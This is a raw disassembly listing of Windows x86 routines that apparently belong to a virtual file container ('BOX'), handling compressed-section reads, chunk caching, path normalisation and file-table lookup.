loc_4D0CEF: ; CODE XREF: sub_4D0C5C+58�j
lea eax, [ebp+var_48]
push eax
call ds:dword_4E172C ; GetSystemTimeAsFileTime
and [ebp+var_4C], 0
jmp short loc_4D0D06
; ---------------------------------------------------------------------------
loc_4D0CFF: ; CODE XREF: sub_4D0C5C:loc_4D0D4D�j
mov eax, [ebp+var_4C]
inc eax
mov [ebp+var_4C], eax
loc_4D0D06: ; CODE XREF: sub_4D0C5C+A1�j
cmp [ebp+var_4C], 3
jnb short loc_4D0D4F
mov eax, [ebp+var_4C]
imul eax, 18h
add eax, offset dword_4E0B70
mov [ebp+var_74], eax
mov eax, [ebp+var_74]
mov ecx, [ebp+var_44]
cmp ecx, [eax+4]
jl short loc_4D0D4D
jg short loc_4D0D31
mov eax, [ebp+var_74]
mov ecx, [ebp+var_48]
cmp ecx, [eax]
jbe short loc_4D0D4D
loc_4D0D31: ; CODE XREF: sub_4D0C5C+C9�j
mov eax, [ebp+var_4C]
imul eax, 18h
add eax, offset dword_4E0B70
mov ecx, [eax]
mov [ebp+var_48], ecx
mov eax, [eax+4]
mov [ebp+var_44], eax
mov eax, [ebp+var_4C]
mov [ebp+var_28], eax
loc_4D0D4D: ; CODE XREF: sub_4D0C5C+C7�j
; sub_4D0C5C+D3�j
jmp short loc_4D0CFF
; ---------------------------------------------------------------------------
loc_4D0D4F: ; CODE XREF: sub_4D0C5C+AE�j
mov eax, [ebp+var_28]
imul eax, 18h
and ds:dword_4E0B78[eax], 0
mov eax, [ebp+var_28]
imul eax, 18h
and ds:dword_4E0B7C[eax], 0
mov eax, [ebp+var_28]
imul eax, 18h
add eax, offset dword_4E0B70
and dword ptr [eax], 0
and dword ptr [eax+4], 0
mov eax, [ebp+var_28]
imul eax, 18h
mov eax, ds:off_4E0B80[eax]
mov eax, [eax]
mov [ebp+var_3C], eax
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_4E1908
mov ecx, [ecx+8]
cmp dword ptr [ecx+eax+8], 0
jnz loc_4D0EAD
mov eax, [ebp+var_34]
mov eax, [eax+8]
add eax, 0FFFFh
shr eax, 10h
mov [ebp+var_54], eax
and [ebp+var_50], 0
and [ebp+var_4], 0
mov eax, [ebp+var_54]
shl eax, 2
push eax
call sub_4D835A
pop ecx
mov [ebp+var_6C], eax
mov eax, [ebp+var_6C]
mov [ebp+var_50], eax
and [ebp+var_58], 0
mov eax, [ebp+var_54]
shl eax, 2
mov ecx, [ebp+var_34]
mov ecx, [ecx+4]
sub ecx, eax
mov [ebp+var_5C], ecx
push 0
push 0
push [ebp+var_5C]
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call ds:dword_4E1788 ; SetFilePointer
cmp eax, [ebp+var_5C]
jz short loc_4D0E1B
push 0FFFFFFFFh
and [ebp+var_78], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_78]
jmp loc_4D0FFA
; ---------------------------------------------------------------------------
loc_4D0E1B: ; CODE XREF: sub_4D0C5C+1A4�j
push 0
lea eax, [ebp+var_58]
push eax
mov eax, [ebp+var_54]
shl eax, 2
push eax
push [ebp+var_50]
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call ds:dword_4E177C ; ReadFile
test eax, eax
jnz short loc_4D0E54
push 0FFFFFFFFh
and [ebp+var_7C], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_7C]
jmp loc_4D0FFA
; ---------------------------------------------------------------------------
loc_4D0E54: ; CODE XREF: sub_4D0C5C+1DD�j
mov eax, [ebp+var_54]
shl eax, 2
cmp [ebp+var_58], eax
jz short loc_4D0E78
push 0FFFFFFFFh
and [ebp+var_80], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_80]
jmp loc_4D0FFA
; ---------------------------------------------------------------------------
loc_4D0E78: ; CODE XREF: sub_4D0C5C+201�j
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_4E1908
mov ecx, [ecx+8]
mov edx, [ebp+var_50]
mov [ecx+eax+8], edx
and [ebp+var_50], 0
or [ebp+var_4], 0FFFFFFFFh
call sub_4D0E9D
jmp short loc_4D0EAD
sub_4D0C5C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4D0E9D proc near ; CODE XREF: sub_4D0C5C+23A�p
; DATA XREF: _5:004DE3C0�o
mov eax, [ebp-50h]
mov [ebp-70h], eax
push dword ptr [ebp-70h]
call sub_4D83DD
pop ecx
retn
sub_4D0E9D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D0C5C
loc_4D0EAD: ; CODE XREF: sub_4D0C5C+144�j
; sub_4D0C5C+23F�j
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_4E1908
mov ecx, [ecx+8]
mov eax, [ecx+eax+8]
mov [ebp+var_30], eax
and [ebp+var_20], 0
and [ebp+var_1C], 0
cmp [ebp+arg_4], 0
jz short loc_4D0F2D
mov eax, [ebp+var_34]
mov eax, [eax+8]
add eax, 0FFFFh
shr eax, 10h
mov [ebp+var_60], eax
mov eax, [ebp+arg_4]
cmp eax, [ebp+var_60]
jb short loc_4D0F00
push ds:off_4DE4F8
push 93h
push ds:off_4DE4FC
call sub_4D848C
loc_4D0F00: ; CODE XREF: sub_4D0C5C+28C�j
and [ebp+var_64], 0
jmp short loc_4D0F0D
; ---------------------------------------------------------------------------
loc_4D0F06: ; CODE XREF: sub_4D0C5C+2CF�j
mov eax, [ebp+var_64]
inc eax
mov [ebp+var_64], eax
loc_4D0F0D: ; CODE XREF: sub_4D0C5C+2A8�j
mov eax, [ebp+var_64]
cmp eax, [ebp+arg_4]
jnb short loc_4D0F2D
mov eax, [ebp+var_64]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 7FFFFFFFh
mov ecx, [ebp+var_20]
add ecx, eax
mov [ebp+var_20], ecx
jmp short loc_4D0F06
; ---------------------------------------------------------------------------
loc_4D0F2D: ; CODE XREF: sub_4D0C5C+273�j
; sub_4D0C5C+2B7�j
lea eax, [ebp+var_1C]
push eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 7FFFFFFFh
push eax
mov eax, [ebp+var_34]
mov eax, [eax+4]
add eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call loc_4D0A10
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jnz short loc_4D0F62
xor eax, eax
jmp loc_4D0FFA
; ---------------------------------------------------------------------------
loc_4D0F62: ; CODE XREF: sub_4D0C5C+2FD�j
mov [ebp+var_2C], 10000h
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 80000000h
test eax, eax
jnz short loc_4D0FAE
push [ebp+var_1C]
push [ebp+var_38]
lea eax, [ebp+var_2C]
push eax
push [ebp+var_3C]
call sub_4DD9F3
add esp, 10h
mov [ebp+var_68], eax
cmp [ebp+var_68], 0
jz short loc_4D0FAC
push [ebp+var_68]
push offset aBoxReadcompres ; ":BOX:ReadCompressedSection: decompresio"...
call sub_4D8726
pop ecx
pop ecx
xor eax, eax
jmp short loc_4D0FFA
; ---------------------------------------------------------------------------
loc_4D0FAC: ; CODE XREF: sub_4D0C5C+33B�j
jmp short loc_4D0FC5
; ---------------------------------------------------------------------------
loc_4D0FAE: ; CODE XREF: sub_4D0C5C+31D�j
mov ecx, [ebp+var_1C]
mov esi, [ebp+var_38]
mov edi, [ebp+var_3C]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_4D0FC5: ; CODE XREF: sub_4D0C5C:loc_4D0FAC�j
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, [ebp+arg_4]
mov ds:dword_4E0B78[eax], ecx
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, [ebp+arg_0]
mov ecx, [ecx]
mov ds:dword_4E0B7C[eax], ecx
mov eax, [ebp+var_28]
imul eax, 18h
add eax, offset dword_4E0B70
push eax
call ds:dword_4E172C ; GetSystemTimeAsFileTime
mov eax, [ebp+var_3C]
loc_4D0FFA: ; CODE XREF: sub_4D0C5C+8C�j
; sub_4D0C5C+1BA�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4D0C5C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D100B proc near ; CODE XREF: sub_4D1177+16C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
shr eax, 10h
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_14]
lea eax, [ecx+eax-1]
shr eax, 10h
mov [ebp+var_4], eax
push [ebp+var_10]
push [ebp+arg_0]
call sub_4D0C5C
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4D1050
xor eax, eax
jmp loc_4D1171
; ---------------------------------------------------------------------------
loc_4D1050: ; CODE XREF: sub_4D100B+3C�j
mov eax, [ebp+var_14]
xor edx, edx
mov ecx, 10000h
div ecx
mov [ebp+var_8], edx
mov eax, 10000h
sub eax, [ebp+var_8]
cmp [ebp+arg_8], eax
jnb short loc_4D1074
mov eax, [ebp+arg_8]
mov [ebp+var_18], eax
jmp short loc_4D107F
; ---------------------------------------------------------------------------
loc_4D1074: ; CODE XREF: sub_4D100B+5F�j
mov eax, 10000h
sub eax, [ebp+var_8]
mov [ebp+var_18], eax
loc_4D107F: ; CODE XREF: sub_4D100B+67�j
mov ecx, [ebp+var_18]
mov esi, [ebp+var_C]
add esi, [ebp+var_8]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, 10000h
sub eax, [ebp+var_8]
cmp [ebp+arg_8], eax
jnb short loc_4D10AE
mov eax, [ebp+arg_8]
mov [ebp+var_1C], eax
jmp short loc_4D10B9
; ---------------------------------------------------------------------------
loc_4D10AE: ; CODE XREF: sub_4D100B+99�j
mov eax, 10000h
sub eax, [ebp+var_8]
mov [ebp+var_1C], eax
loc_4D10B9: ; CODE XREF: sub_4D100B+A1�j
mov eax, [ebp+var_1C]
mov [ebp+var_8], eax
loc_4D10BF: ; CODE XREF: sub_4D100B+15E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_10]
jbe loc_4D116E
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_8]
ja short loc_4D10F0
push ds:off_4DE4F8
push 0BBh
push ds:off_4DE4FC
call sub_4D848C
loc_4D10F0: ; CODE XREF: sub_4D100B+CD�j
push [ebp+var_10]
push [ebp+arg_0]
call sub_4D0C5C
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4D1108
xor eax, eax
jmp short loc_4D1171
; ---------------------------------------------------------------------------
loc_4D1108: ; CODE XREF: sub_4D100B+F7�j
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
cmp eax, 10000h
jnb short loc_4D1120
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
mov [ebp+var_20], eax
jmp short loc_4D1127
; ---------------------------------------------------------------------------
loc_4D1120: ; CODE XREF: sub_4D100B+108�j
mov [ebp+var_20], 10000h
loc_4D1127: ; CODE XREF: sub_4D100B+113�j
mov ecx, [ebp+var_20]
mov esi, [ebp+var_C]
mov edi, [ebp+arg_4]
add edi, [ebp+var_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
cmp eax, 10000h
jnb short loc_4D1159
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
mov [ebp+var_24], eax
jmp short loc_4D1160
; ---------------------------------------------------------------------------
loc_4D1159: ; CODE XREF: sub_4D100B+141�j
mov [ebp+var_24], 10000h
loc_4D1160: ; CODE XREF: sub_4D100B+14C�j
mov eax, [ebp+var_8]
add eax, [ebp+var_24]
mov [ebp+var_8], eax
jmp loc_4D10BF
; ---------------------------------------------------------------------------
loc_4D116E: ; CODE XREF: sub_4D100B+BA�j
push 1
pop eax
loc_4D1171: ; CODE XREF: sub_4D100B+40�j
; sub_4D100B+FB�j
pop edi
pop esi
leave
retn 0Ch
sub_4D100B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1177 proc near ; CODE XREF: sub_4CF94C+242�p
; sub_4CFFBF+194�p ...
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 004D145D SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE3C8
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 3Ch
push ebx
push esi
push edi
cmp [ebp+arg_14], 0
jnz short loc_4D11A8
lea eax, [ebp+var_1C]
mov [ebp+arg_14], eax
loc_4D11A8: ; CODE XREF: sub_4D1177+29�j
mov eax, ds:dword_4E18E4
mov [ebp+var_3C], eax
cmp [ebp+var_3C], 0
jz short loc_4D11C9
mov eax, [ebp+var_3C]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_40], 1
jmp short loc_4D11CD
; ---------------------------------------------------------------------------
loc_4D11C9: ; CODE XREF: sub_4D1177+3D�j
and [ebp+var_40], 0
loc_4D11CD: ; CODE XREF: sub_4D1177+50�j
movzx eax, [ebp+var_40]
test eax, eax
jz loc_4D145D
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E18E4
call sub_4DB871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz loc_4D1436
cmp [ebp+arg_10], 0
jz short loc_4D1207
mov eax, [ebp+arg_10]
mov dword ptr [eax], 3E5h
loc_4D1207: ; CODE XREF: sub_4D1177+85�j
mov eax, [ebp+var_20]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_30], eax
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz short loc_4D1254
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E177C ; ReadFile
mov ecx, [ebp+arg_14]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_48], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_48]
jmp loc_4D145F
; ---------------------------------------------------------------------------
loc_4D1254: ; CODE XREF: sub_4D1177+A5�j
cmp [ebp+arg_10], 0
jz short loc_4D1281
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 40000000h
test eax, eax
jz short loc_4D1281
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_20]
mov ecx, [ecx+4]
mov [eax+0Ch], ecx
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_10]
mov ecx, [ecx+8]
mov [eax+4], ecx
loc_4D1281: ; CODE XREF: sub_4D1177+E1�j
; sub_4D1177+F0�j
mov eax, [ebp+arg_8]
mov [ebp+var_28], eax
mov eax, [ebp+var_20]
mov eax, [eax+4]
add eax, [ebp+arg_8]
mov ecx, [ebp+var_30]
cmp eax, [ecx+8]
jbe short loc_4D12A7
mov eax, [ebp+var_30]
mov ecx, [ebp+var_20]
mov eax, [eax+8]
sub eax, [ecx+4]
mov [ebp+var_28], eax
loc_4D12A7: ; CODE XREF: sub_4D1177+11F�j
cmp [ebp+arg_C], 0
jnz short loc_4D12B3
lea eax, [ebp+var_2C]
mov [ebp+arg_C], eax
loc_4D12B3: ; CODE XREF: sub_4D1177+134�j
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
cmp [ebp+arg_8], 0
jbe loc_4D13B8
cmp [ebp+var_28], 0
jbe loc_4D13B8
mov eax, [ebp+var_30]
mov eax, [eax+0Ch]
and eax, 2
test eax, eax
jz short loc_4D12FE
push [ebp+var_28]
push [ebp+arg_4]
push [ebp+var_20]
call sub_4D100B
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4D12F9
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_28]
mov [eax], ecx
loc_4D12F9: ; CODE XREF: sub_4D1177+178�j
jmp loc_4D13B6
; ---------------------------------------------------------------------------
loc_4D12FE: ; CODE XREF: sub_4D1177+161�j
and [ebp+var_34], 0
loc_4D1302: ; CODE XREF: sub_4D1177+23A�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_28]
jnb loc_4D13B6
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cmp eax, 10000h
jnb short loc_4D1326
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
mov [ebp+var_4C], eax
jmp short loc_4D132D
; ---------------------------------------------------------------------------
loc_4D1326: ; CODE XREF: sub_4D1177+1A2�j
mov [ebp+var_4C], 10000h
loc_4D132D: ; CODE XREF: sub_4D1177+1AD�j
push [ebp+arg_C]
push [ebp+var_4C]
mov eax, [ebp+var_30]
mov eax, [eax+4]
mov ecx, [ebp+var_20]
add eax, [ecx+4]
add eax, [ebp+var_34]
push eax
push [ebp+var_20]
call loc_4D0A10
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jz short loc_4D137D
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cmp eax, 10000h
jnb short loc_4D136C
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
mov [ebp+var_50], eax
jmp short loc_4D1373
; ---------------------------------------------------------------------------
loc_4D136C: ; CODE XREF: sub_4D1177+1E8�j
mov [ebp+var_50], 10000h
loc_4D1373: ; CODE XREF: sub_4D1177+1F3�j
mov eax, [ebp+arg_C]
mov eax, [eax]
cmp eax, [ebp+var_50]
jz short loc_4D1383
loc_4D137D: ; CODE XREF: sub_4D1177+1DB�j
and [ebp+var_24], 0
jmp short loc_4D13B6
; ---------------------------------------------------------------------------
loc_4D1383: ; CODE XREF: sub_4D1177+204�j
mov [ebp+var_24], 1
mov eax, [ebp+arg_C]
mov ecx, [eax]
mov esi, [ebp+var_38]
mov edi, [ebp+arg_4]
add edi, [ebp+var_34]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_34]
add ecx, [eax]
mov [ebp+var_34], ecx
jmp loc_4D1302
; ---------------------------------------------------------------------------
loc_4D13B6: ; CODE XREF: sub_4D1177:loc_4D12F9�j
; sub_4D1177+191�j ...
jmp short loc_4D13C5
; ---------------------------------------------------------------------------
loc_4D13B8: ; CODE XREF: sub_4D1177+146�j
; sub_4D1177+150�j
mov [ebp+var_24], 1
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
loc_4D13C5: ; CODE XREF: sub_4D1177:loc_4D13B6�j
cmp [ebp+var_24], 0
jz short loc_4D13DC
mov eax, [ebp+var_20]
mov eax, [eax+4]
mov ecx, [ebp+arg_C]
add eax, [ecx]
mov ecx, [ebp+var_20]
mov [ecx+4], eax
loc_4D13DC: ; CODE XREF: sub_4D1177+252�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_24]
mov [eax], ecx
cmp [ebp+arg_10], 0
jz short loc_4D141D
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 40000000h
test eax, eax
jz short loc_4D141D
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_10]
mov ecx, [ecx+0Ch]
mov [eax+4], ecx
mov eax, [ebp+arg_10]
and dword ptr [eax+0Ch], 0
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
mov [eax+4], ecx
mov eax, [ebp+arg_10]
and dword ptr [eax], 0
loc_4D141D: ; CODE XREF: sub_4D1177+271�j
; sub_4D1177+280�j
push 0FFFFFFFFh
mov [ebp+var_54], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_54]
jmp short loc_4D145F
; ---------------------------------------------------------------------------
loc_4D1436: ; CODE XREF: sub_4D1177+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D1441
jmp short loc_4D145D
sub_4D1177 endp
; =============== S U B R O U T I N E =======================================
sub_4D1441 proc near ; CODE XREF: sub_4D1177+2C3�p
; DATA XREF: _5:004DE3D0�o
mov eax, ds:dword_4E18E4
mov [ebp-44h], eax
cmp dword ptr [ebp-44h], 0
jz short locret_4D145C
mov eax, [ebp-44h]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
locret_4D145C: ; CODE XREF: sub_4D1441+C�j
retn
sub_4D1441 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D1177
loc_4D145D: ; CODE XREF: sub_4D1177+5C�j
; sub_4D1177+2C8�j
xor eax, eax
loc_4D145F: ; CODE XREF: sub_4D1177+D8�j
; sub_4D1177+2BD�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
; END OF FUNCTION CHUNK FOR sub_4D1177
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1470 proc near ; CODE XREF: sub_4CF252+91�p
; sub_4D153F+B4�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_4], 1
mov [ebp+var_8], 2
jmp short loc_4D1490
; ---------------------------------------------------------------------------
loc_4D1489: ; CODE XREF: sub_4D1470+5E�j
; sub_4D1470+7F�j ...
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4D1490: ; CODE XREF: sub_4D1470+17�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_10]
jnb loc_4D1523
mov eax, ds:dword_4E1908
add eax, [ebp+var_8]
mov al, [eax+810h]
mov [ebp+var_C], al
movsx eax, [ebp+var_C]
mov ecx, ds:dword_4E1908
add ecx, [ebp+var_4]
movsx ecx, byte ptr [ecx+810h]
cmp eax, ecx
jnz short loc_4D14D0
movsx eax, [ebp+var_C]
cmp eax, 5Ch
jnz short loc_4D14D0
jmp short loc_4D1489
; ---------------------------------------------------------------------------
loc_4D14D0: ; CODE XREF: sub_4D1470+53�j
; sub_4D1470+5C�j
movsx eax, [ebp+var_C]
cmp eax, 2Fh
jnz short loc_4D14F1
mov eax, ds:dword_4E1908
add eax, [ebp+var_8]
mov byte ptr [eax+810h], 5Ch
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
jmp short loc_4D1489
; ---------------------------------------------------------------------------
loc_4D14F1: ; CODE XREF: sub_4D1470+67�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_8]
jz short loc_4D1517
mov eax, ds:dword_4E1908
add eax, [ebp+var_4]
mov ecx, ds:dword_4E1908
add ecx, [ebp+var_8]
mov cl, [ecx+810h]
mov [eax+811h], cl
loc_4D1517: ; CODE XREF: sub_4D1470+88�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp loc_4D1489
; ---------------------------------------------------------------------------
loc_4D1523: ; CODE XREF: sub_4D1470+26�j
mov eax, ds:dword_4E1908
add eax, [ebp+var_4]
and byte ptr [eax+811h], 0
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+var_10]
sub ecx, eax
mov eax, ecx
leave
retn
sub_4D1470 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D153F proc near ; CODE XREF: sub_4CFD24+3A�p
; sub_4D0346+19�p ...
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_56 = byte ptr -56h
var_55 = byte ptr -55h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 004D18BC SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE3D8
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 50h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz short loc_4D1570
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_4D1570: ; CODE XREF: sub_4D153F+29�j
cmp ds:dword_4E1908, 0
jnz short loc_4D1580
xor eax, eax
jmp loc_4D18BE
; ---------------------------------------------------------------------------
loc_4D1580: ; CODE XREF: sub_4D153F+38�j
and [ebp+var_1C], 0
push offset dword_4E18C8
call ds:dword_4E16C4 ; RtlEnterCriticalSection
and [ebp+var_4], 0
push 4
push offset a? ; "\\\\?\\"
push [ebp+arg_0]
call sub_4CC730
add esp, 0Ch
test eax, eax
jnz short loc_4D15B2
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
loc_4D15B2: ; CODE XREF: sub_4D153F+68�j
lea eax, [ebp+var_1C]
push eax
mov eax, ds:dword_4E1908
add eax, 810h
push eax
push 104h
push [ebp+arg_0]
call ds:dword_4E1708 ; GetFullPathNameA
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz loc_4D18A5
push [ebp+var_20]
mov eax, ds:dword_4E1908
add eax, 810h
push eax
call ds:dword_4E17C8 ; CharUpperBuffA
mov ecx, [ebp+var_20]
call sub_4D1470
mov ecx, [ebp+var_1C]
sub ecx, eax
mov [ebp+var_1C], ecx
mov eax, ds:dword_4E1908
mov eax, [eax+0C14h]
mov [ebp+var_24], eax
mov eax, ds:dword_4E1908
mov ecx, [eax+0C14h]
mov edi, ds:dword_4E1908
add edi, 10h
mov esi, ds:dword_4E1908
add esi, 810h
xor eax, eax
repe cmpsb
jz short loc_4D1679
mov eax, ds:dword_4E1908
mov ecx, [eax+0C18h]
mov edi, ds:dword_4E1908
add edi, 410h
mov esi, ds:dword_4E1908
add esi, 810h
xor eax, eax
repe cmpsb
jnz loc_4D181A
mov eax, ds:dword_4E1908
mov eax, [eax+0C18h]
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_4D181A
loc_4D1679: ; CODE XREF: sub_4D153F+F3�j
mov eax, [ebp+var_24]
mov ecx, ds:dword_4E1908
lea eax, [ecx+eax+810h]
mov [ebp+var_28], eax
mov edi, [ebp+var_28]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_34], ecx
mov [ebp+var_38], 1
mov eax, ds:dword_4E1908
mov eax, [eax+0Ch]
mov [ebp+var_2C], eax
and [ebp+var_30], 0
loc_4D16B2: ; CODE XREF: sub_4D153F:loc_4D1752�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_2C]
ja loc_4D1757
mov eax, [ebp+var_38]
add eax, [ebp+var_2C]
shr eax, 1
mov [ebp+var_44], eax
mov eax, [ebp+var_44]
dec eax
shl eax, 4
mov ecx, ds:dword_4E1908
mov ecx, [ecx+8]
mov eax, [ecx+eax]
mov [ebp+var_3C], eax
push [ebp+var_34]
mov eax, [ebp+var_3C]
push dword ptr [eax]
push [ebp+var_28]
call sub_4CC730
add esp, 0Ch
mov [ebp+var_40], eax
cmp [ebp+var_40], 0
jnz short loc_4D173C
mov eax, [ebp+var_3C]
mov eax, [eax]
mov ecx, [ebp+var_34]
movsx eax, byte ptr [eax+ecx]
test eax, eax
jz short loc_4D171C
mov eax, [ebp+var_3C]
mov eax, [eax]
mov ecx, [ebp+var_34]
movsx eax, byte ptr [eax+ecx]
cmp eax, 5Ch
jnz short loc_4D1733
loc_4D171C: ; CODE XREF: sub_4D153F+1CA�j
mov eax, [ebp+var_44]
dec eax
shl eax, 4
mov ecx, ds:dword_4E1908
mov ecx, [ecx+8]
add ecx, eax
mov [ebp+var_30], ecx
jmp short loc_4D1757
; ---------------------------------------------------------------------------
loc_4D1733: ; CODE XREF: sub_4D153F+1DB�j
mov eax, [ebp+var_44]
dec eax
mov [ebp+var_2C], eax
jmp short loc_4D1752
; ---------------------------------------------------------------------------
